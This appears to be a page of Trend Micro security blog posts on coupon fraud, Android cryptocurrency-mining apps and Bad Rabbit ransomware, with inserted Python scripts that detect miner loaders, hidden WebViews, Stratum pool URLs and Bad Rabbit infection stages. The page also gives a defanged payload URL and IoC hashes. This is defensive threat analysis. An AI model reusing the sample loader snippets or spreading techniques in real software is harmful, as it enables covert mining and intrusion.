Are you working for a US-based firm that holds personal information about European Union or Swiss citizens? If so, you should do three things. 1) Opt in to the Privacy Shield. 2) Put a Data Protection Officer in place. 3) Ensure your IAM solution is comprehensive and effective.

Hacker Hijacks North Korean Radio Station and Plays ‘The Final Countdown’

A North Korean radio station was reportedly hijacked by an unknown hacker to play the 1980s hit song “The Final Countdown”. The short-wave radio station, 6400kHz, is allegedly run from the North Korean city of Kanggye and is known to be used by Pyongyang to transmit secret codes.


Author: Jon Clay

Coupon fraud could be costing your business millions

Category : Trend Micro

Customers are always looking for good deals with their purchases and a coupon could be the defining factor for a buyer completing his or her transaction. In fact, a 2015 survey by found that paper coupons were used by 63 percent of respondents. This is followed by discounts for online and mobile purchases. Distributed coupons are valued at billions of dollars every year and companies continue to use these techniques to attract consumers for their business. However, there is a darker side to couponing: fraud. The real-life costs of this crime go beyond the deals consumers get and could be costing your business millions.

While seemingly a mild form of fraud, wide-spread coupon fraud can add up.


What is coupon fraud?

Coupon fraud comes in a variety of flavors. Normally, coupon transactions are simply data changing hands between the consumer, coupon providers and an agent that sorts and audits the coupons. Because there are so many layers, only one needs to be vulnerable to affect the whole supply chain. The Balance noted that shoppers often participate in coupon fraud by making multiple copies of the coupon, using the discount for products that extend beyond those listed in the terms, stealing newspaper inserts and buying or selling coupons. When consumers don’t stick to the rules for printing out coupons or abiding by the usage agreements, this is considered illegal activity and leaves businesses covering the cost.

Coupon fraud is costing businesses millions.

Just how damaging is it?

When a business accepts a counterfeit coupon or scans and authorizes a deal for products that aren’t listed on the coupon, it might not be caught at first. It can even seem like a small occurrence compared to all of the other transactions that the business might see throughout the day. However, PennLive put realistic estimates of coupon crime costs between $300 million and $600 million per year in the U.S. While losses will vary per organization, this is still no small price to pay for any business.

With such a lucrative market, cyber criminals are taking advantage of coupon fraud for their own payday. In fact, Trend Micro stated that coupon fraud’s scalability results in business process compromise, which undermines business operations components and significantly impacts the bottom line. Fraudsters can generate purportedly valid coupon codes and distribute them to unknowing consumers. New customer promos are also sold in bulk in the underground, which allow buyers to take advantage of perks given upon account registration. These occurrences mount up, earning criminals money while costing your business.

Be aware of distribution channels

How coupons are sent to customers can be an important factor in coupon fraud cases. Social media in particular is being used more for delivering great deals and acting as a marketplace for potential transactions. Cyber criminals have identified this tactic and are devising their own legitimate-looking coupons or discounts to scam social media users. According to Consumer Affairs, a recent online coupon scam promised deals on popular consumer products. The catch was that the buyer would need to provide their credit card information or personal identifying data in order to get the coupon. Fraudsters could then sell this data on the underground market and use it for identity theft.

If your business decides to market through social media, it’s important to show that your page is verified. This could help consumers better identify real deals while still attracting revenue opportunities through the social channels. As cyber criminals continue to create legitimate-looking coupon codes and scams, it will be integral for organizations to direct customers to actual discount pages.

Spotting and stopping fake coupons

For businesses and consumers alike, coupon fraud is a major problem. Businesses increase the prices on products to make up for the losses, which then impacts consumers that seek to legitimately use coupons. This cyclical occurrence will continue as long as fake coupons are distributed. There are a few signs that organizations should be wary of:

  • Coupons without bar codes.
  • Discounts where a purchase isn’t required to redeem it.
  • Deals that are more than the actual price of the item.
  • Coupons that don’t have conditions of usage on them.

Cashiers themselves must be trained on how to use coupons properly and catch potential fraud cases.

Smart coupon creation can make a big difference in identifying legitimate ones over counterfeits. Trend Micro suggested putting safeguards in place like limiting the reuse, distribution and time limit for coupon codes. Businesses can also personalize coupons and use anti-counterfeit techniques like complex data codes, watermarks, code authentication and microprinting to deter scammers from duplicating codes and deals. Leaders must also work with distributors, stakeholders and law enforcement to establish stronger fraud resistance and risk management policies for coupon programs. All the while, organizations need to maintain the privacy, security and integrity of their infrastructure that manages critical processes.

Organizations must be prudent in their coupon strategies this holiday season.


Don’t be duped this holiday

As the holiday season approaches, more businesses will start coming out with sales and deals on their products and services. However, it’s also the perfect time for cyber criminals and coupon counterfeiters to make a quick payday off of unsuspecting victims. Consumers must take care to check over their coupons for terms of agreement and remain wary of deals that ask for personal information, particularly those distributed through social media sites.

Organizations must take action now to determine the best distribution strategy for their sales marketing strategy while also designing their coupons to limit fraud opportunities. Here, a time limit mark could be a great solution, along with design choices to reflect the holiday season. This makes it much harder for criminals to replicate and helps consumers identify which deals are legitimate. Retailers must be prudent to ensure buyers play by the rules to get freebies and discounts.

Safeguards will limit coupon fraud and prevent abusers from repeatedly cashing in on coupons this holiday season.



Data Center Attack: The Game

Category : Trend Micro

Game Overview

In Data Center Attack: The Game, put yourself in the shoes of a CISO at a hospital to see if you can go back in time to prevent a data center attack from holding critical patient data hostage.

You’ll be prompted to make decisions that will impact your security posture. Wrong choices could result in ransomware hijacking your patient data and putting lives at risk. Right choices will show you what happens when DevOps and IT work together: doctors can see patient data, and the hospital runs as expected.

See if you have the knowledge it takes to stop a data center attack, and if not, learn what defenses you need to prevent one.

Play the game now.

Coin Miner Mobile Malware Returns, Hits Google Play

Category : Trend Micro

The ability of mobile devices to actually produce cryptocurrency in any meaningful amount is still doubtful. However, the effects on users of affected devices are clear: increased device wear and tear, reduced battery life, and comparably slower performance.

Recently, we found apps with malicious cryptocurrency mining capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER.

This is not the first time we’ve found these types of apps on app stores. Several years ago, we found malicious apps on the Google Play store detected as ANDROIDOS_KAGECOIN, a malware family with hidden cryptocurrency mining capabilities.

ANDROIDOS_JSMINER: Mining via Coinhive

We’ve previously seen tech support scams and compromised websites used to deliver the Coinhive JavaScript cryptocurrency miner to users. However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER. We found two such apps: one supposedly helps users pray the rosary, while the other provides discounts of various kinds.

Figures 1 and 2. JSMINER Malware on Google Play

Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key:

Figure 3. Code to start mining when the app starts

This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default.

Figure 4. Webview is set to invisible mode

When the malicious JavaScript code is running, the CPU usage will be exceptionally high.

ANDROIDOS_CPUMINER: Trojanized versions of legitimate apps

Another family of malicious apps takes legitimate versions of apps and adds mining libraries, which are then repackaged and distributed. We detect these as ANDROIDOS_CPUMINER.

One version of this malware is in Google Play and disguised as a wallpaper application:

Figure 5. Mining malware on Google Play store

The mining code appears to be a modified version of the legitimate cpuminer library. The legitimate version is only up to 2.5.0, whereas this malicious version uses 2.5.1. The code is added to normal applications, as seen below:

Figure 6. Code added to normal apps by CPUMINER

Please note that the above code layout was taken from a sample that is not found on Google Play, but belongs to the same family.

Figure 7. Malware with modified code

The mining code fetches a configuration file from the cybercriminal’s own server (which uses a dynamic DNS service) that provides information on its mining pool via the Stratum mining protocol.

Figure 8. Cryptocurrency mining profits

The figure above shows that the attacker is mining various cryptocurrencies, with varying amounts of currencies mined. It also shows that the value of the coins mined over an unknown period amounts to just over 170 US dollars; total profits aren’t known.
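As an added example (not code from the original post or from Trend Micro), a small Python triage script that applies the indicators described for both families, JSMINER (the Coinhive library loaded into a WebView set to invisible) and CPUMINER (a cpuminer build with a version above the upstream 2.5.0, a Stratum pool URL and a dynamic-DNS config host), to text pulled from an unpacked app. The Coinhive script URL and API name, the `stratum+tcp://` scheme, the dynamic-DNS provider domains and all sample file contents are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Indicators for the two families described in the post. The Coinhive URL/API name, the
# stratum+tcp:// scheme and the dynamic-DNS domains are assumed from public knowledge of
# those tools; they are not taken from the post.
INDICATORS = {
    "coinhive_lib": re.compile(
        r"coinhive\.com/lib/coinhive(?:\.min)?\.js|CoinHive\.Anonymous\(", re.I),
    "hidden_webview": re.compile(
        r"setVisibility\(\s*(?:View\.)?INVISIBLE\s*\)|android:visibility=\"invisible\"", re.I),
    "js_enabled": re.compile(r"setJavaScriptEnabled\(\s*true\s*\)"),
    "cpuminer_banner": re.compile(r"cpuminer[-\s]?(\d+\.\d+\.\d+)", re.I),
    "stratum_url": re.compile(r"stratum\+tcp://[\w.\-]+:\d+", re.I),
    "dynamic_dns": re.compile(r"\b[\w-]+\.(?:ddns\.net|no-ip\.(?:com|org))\b", re.I),
}

@dataclass
class Finding:
    family: str                               # "JSMINER", "CPUMINER" or "none"
    hits: dict = field(default_factory=dict)  # indicator -> (file, matched text)

def scan_artifacts(files):
    """files: {path inside the unpacked app: text content}. Records the first match per
    indicator and derives a family verdict from the behaviour combinations the post describes."""
    hits = {}
    for path, text in files.items():
        for name, rx in INDICATORS.items():
            m = rx.search(text)
            if m and name not in hits:
                hits[name] = (path, m.group(0))
    family = "none"
    if "coinhive_lib" in hits and ("hidden_webview" in hits or "js_enabled" in hits):
        family = "JSMINER"    # Coinhive loaded into a WebView the user cannot see
    elif "cpuminer_banner" in hits or "stratum_url" in hits:
        family = "CPUMINER"   # repackaged app carrying a cpuminer build
    return Finding(family, hits)

def cpuminer_version_is_suspicious(hits):
    """Upstream cpuminer only reached 2.5.0 per the post; a higher banner points to a modified build."""
    if "cpuminer_banner" not in hits:
        return False
    version = INDICATORS["cpuminer_banner"].search(hits["cpuminer_banner"][1]).group(1)
    return tuple(int(p) for p in version.split(".")) > (2, 5, 0)

# Constructed stand-ins for decompiled sources, assets and .so strings (not real samples).
SAMPLE_JSMINER = {
    "assets/miner.html": '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
                         '<script>new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER").start();</script>',
    "src/MainActivity.java": "web.getSettings().setJavaScriptEnabled(true);\n"
                             "web.setVisibility(View.INVISIBLE);\n"
                             "web.loadUrl(\"file:///android_asset/miner.html\");",
}
SAMPLE_CPUMINER = {
    "lib/armeabi/libminer.so (strings)": "cpuminer 2.5.1\n"
                                         "stratum+tcp://pool.example.invalid:3333\n"
                                         "http://miner-cfg.ddns.net/conf.json",
}
SAMPLE_BENIGN = {
    "src/Wallpaper.java": "web.getSettings().setJavaScriptEnabled(true);\n"
                          "image.setVisibility(View.VISIBLE);",
}

if __name__ == "__main__":
    for label, files in [("JSMINER", SAMPLE_JSMINER), ("CPUMINER", SAMPLE_CPUMINER), ("benign", SAMPLE_BENIGN)]:
        f = scan_artifacts(files)
        print(label, "->", f.family, sorted(f.hits), "modified cpuminer:", cpuminer_version_is_suspicious(f.hits))
```

A JavaScript-enabled WebView on its own is not flagged; the verdict needs the miner library plus the hidden WebView, which is the combination the post describes.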

We have identified a total of 25 samples of ANDROIDOS_CPUMINER. Trend Micro Mobile Security already detects these variants, as well as the JSMINER variants mentioned earlier in this post.

These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit. Users should take note of any performance degradation on their devices after installing an app.

We have reached out to Google, and the apps mentioned in this post are no longer on Google Play.

Indicators of Compromise

The following malicious apps were found on Google Play and are connected to this threat:

SHA256 hash | App name | Package name | Detection name
22581e7e76a09d404d093ab755888743b4c908518c47af66225e2da991d112f0 | Recitiamo Santo Rosario Free | prsolutions.rosariofacileads | ANDROIDOS_JSMINER
440cc9913d623ed42563e90eec352da9438a9fdac331017af2ab9b87a5eee4af | SafetyNet Wireless App | com.freemo.safetynet | ANDROIDOS_JSMINER
d3c0bed627edab9ac1bbc2bcc6e8c3ff45b4708afa527790e42a4a6fe2c045f0 | Car Wallpaper HD: mercedes, ferrari, bmw and audi | com.yrchkor.newwallpapers | ANDROIDOS_CPUMINER



Author: Jason Gu, Veo Zhang, Seven Shen


Bad Rabbit Ransomware Spreads via Network, Hits Ukraine and Russia

Category : Trend Micro

An ongoing ransomware campaign is hitting Eastern European countries with what seems to be a variant of the Petya ransomware dubbed Bad Rabbit (which we detect as RANSOM_BADRABBIT.A). Trend Micro XGen™ security products with machine learning enabled can proactively detect this ransomware as TROJ.Win32.TRX.XXPE002FF019 without the need for a pattern update. The attack comes a few months after the previous Petya outbreak, which struck European countries back in June.

Initial reports peg the main casualties as transport systems and media outlets in Ukraine and Russia. The Ukrainian arm of CERT (CERT-UA) has also issued an advisory warning of further potential ransomware attacks.

Initial Analysis

Figure 1: Bad Rabbit Infection Chain

Our initial analysis found that Bad Rabbit spreads via watering hole attacks that lead to a fake Flash installer “install_flash_player.exe”. Compromised sites are injected with a script that contains a URL that resolves to hxxp://1dnscontrol[.]com/flash_install, which is inaccessible as of the time of publication. We’ve observed some compromised sites from Denmark, Ireland, Turkey, and Russia where it delivered the fake Flash installer.

Figure 2: Code showing the injected script

Once the fake installer is clicked, it will drop the encryptor file infpub.dat using the rundll32.exe process, along with the decryptor file dispci.exe. As part of its routine, Bad Rabbit uses a trio of files referencing the show Game of Thrones, starting with rhaegal.job, which is responsible for executing the decryptor file, as well as a second job file, drogon.job, that is responsible for shutting down the victim’s machine. The ransomware will then proceed to encrypt files in the system and display the ransom note shown above.

Figure 3: Bad Rabbit ransom note showing the installation key

A third file, viserion_23.job, reboots the target system a second time. The screen is then locked, and the following note displayed:

Figure 4: Bad Rabbit ransom note displayed after system reboot

Based on our initial analysis, Bad Rabbit spreads to other computers in the network by dropping copies of itself on network hosts under its original name and executing the dropped copies using Windows Management Instrumentation (WMI) and the Service Control Manager Remote Protocol. When the Service Control Manager Remote Protocol is used, it relies on dictionary attacks to obtain the credentials.

Among the tools Bad Rabbit reportedly incorporates is the open-source utility Mimikatz, which it uses for credential extraction. We also found evidence of it using DiskCryptor, a legitimate disk encryption tool, to encrypt the target systems.

It is important to note that Bad Rabbit does not exploit any vulnerabilities, unlike Petya which used EternalBlue as part of its routine.
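As an added example that is not part of the original analysis, the following Python correlates the Bad Rabbit stages described above (the fake Flash installer, rundll32.exe loading infpub.dat, the rhaegal/drogon/viserion_23 task files, and dispci.exe) per host and within a time window, so that one stage alone, such as a genuine Flash install, does not alert. The event schema, file paths and timestamps are constructed for the example and do not follow any real product's log format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Stage markers taken from the routine described above. Each stage is a name plus a predicate
# over a simplified, Sysmon-like event dict (an assumed schema, constructed for this example).
STAGES = [
    ("fake_installer", lambda e: e["type"] == "process"
        and e["image"].lower().endswith("install_flash_player.exe")),
    ("infpub_via_rundll32", lambda e: e["type"] == "process"
        and e["image"].lower().endswith("rundll32.exe")
        and "infpub.dat" in e.get("cmdline", "").lower()),
    ("got_job_files", lambda e: e["type"] == "task"
        and e["name"].lower() in {"rhaegal", "drogon", "viserion_23"}),
    ("decryptor_run", lambda e: e["type"] == "process"
        and e["image"].lower().endswith("dispci.exe")),
]

def correlate(events, window=timedelta(minutes=30), min_stages=2):
    """Group events per host, record the first time each stage is seen, and alert on hosts
    where at least `min_stages` distinct stages occur within `window` of the earliest one.
    Returns {host: sorted list of stage names that fell inside the window}."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    alerts = {}
    for host, evs in by_host.items():
        seen = {}                                   # stage name -> first timestamp
        for e in evs:
            for stage, match in STAGES:
                if stage not in seen and match(e):
                    seen[stage] = e["ts"]
        if not seen:
            continue
        first = min(seen.values())
        in_window = sorted(s for s, t in seen.items() if t - first <= window)
        if len(in_window) >= min_stages:
            alerts[host] = in_window
    return alerts

# Constructed events: one infected host, one benign Flash install, one host whose two
# matching events are hours apart. Paths and names are placeholders, not observed values.
T0 = datetime(2017, 10, 24, 14, 0, 0)
EVENTS = [
    {"host": "WS01", "ts": T0, "type": "process",
     "image": r"C:\Users\alice\Downloads\install_flash_player.exe", "cmdline": "install_flash_player.exe"},
    {"host": "WS01", "ts": T0 + timedelta(seconds=5), "type": "process",
     "image": r"C:\Windows\System32\rundll32.exe", "cmdline": r"rundll32.exe C:\Windows\infpub.dat"},
    {"host": "WS01", "ts": T0 + timedelta(seconds=20), "type": "task", "name": "rhaegal"},
    {"host": "WS01", "ts": T0 + timedelta(seconds=21), "type": "task", "name": "drogon"},
    {"host": "WS01", "ts": T0 + timedelta(minutes=2), "type": "process",
     "image": r"C:\Windows\dispci.exe", "cmdline": "dispci.exe"},
    {"host": "WS02", "ts": T0, "type": "process",
     "image": r"C:\Users\bob\Downloads\install_flash_player.exe", "cmdline": "install_flash_player.exe"},
    {"host": "WS03", "ts": T0, "type": "task", "name": "rhaegal"},
    {"host": "WS03", "ts": T0 + timedelta(hours=5), "type": "process",
     "image": r"C:\Windows\dispci.exe", "cmdline": "dispci.exe"},
]

if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(f"{host}: Bad Rabbit-like chain, stages seen: {', '.join(stages)}")
```

Widening `window` trades fewer missed chains for more noise; WS03 only alerts once the window covers the five-hour gap between its two events.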

Mitigation and Best Practices

Users can mitigate the impact of ransomware such as Bad Rabbit with the best practices found in this guide.

Trend Micro Solutions

Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls, exploit known, unknown, or undisclosed vulnerabilities, and either steal or encrypt personally identifiable data. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Further information about Trend Micro solutions can be found in this article.

The following SHA256 hashes are detected as RANSOM_BADRABBIT.A:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93

Additional hashes related to this ransomware:

  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
  • 141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0

Updated on October 24, 2017, 9:52 PM PDT to add more technical information 

Updated on October 24, 2017, 11:34 PM PDT to add the infection chain

Updated on October 25, 2017, 10:23 PM PDT to update the infection chain



No More Limits

Category : Trend Micro

Watch Josh Atwell, Developer Advocate at NetApp, explain. For more information, please visit

Maximize VMware on AWS

Category : Trend Micro

For far too long, customers have faced a binary choice between VMware and AWS.

For many years if you wanted to use both VMware and AWS, it required a lot of reprogramming and retraining of staff to get the two solutions to work in tandem. Now, that’s no longer the case. For more information, please visit: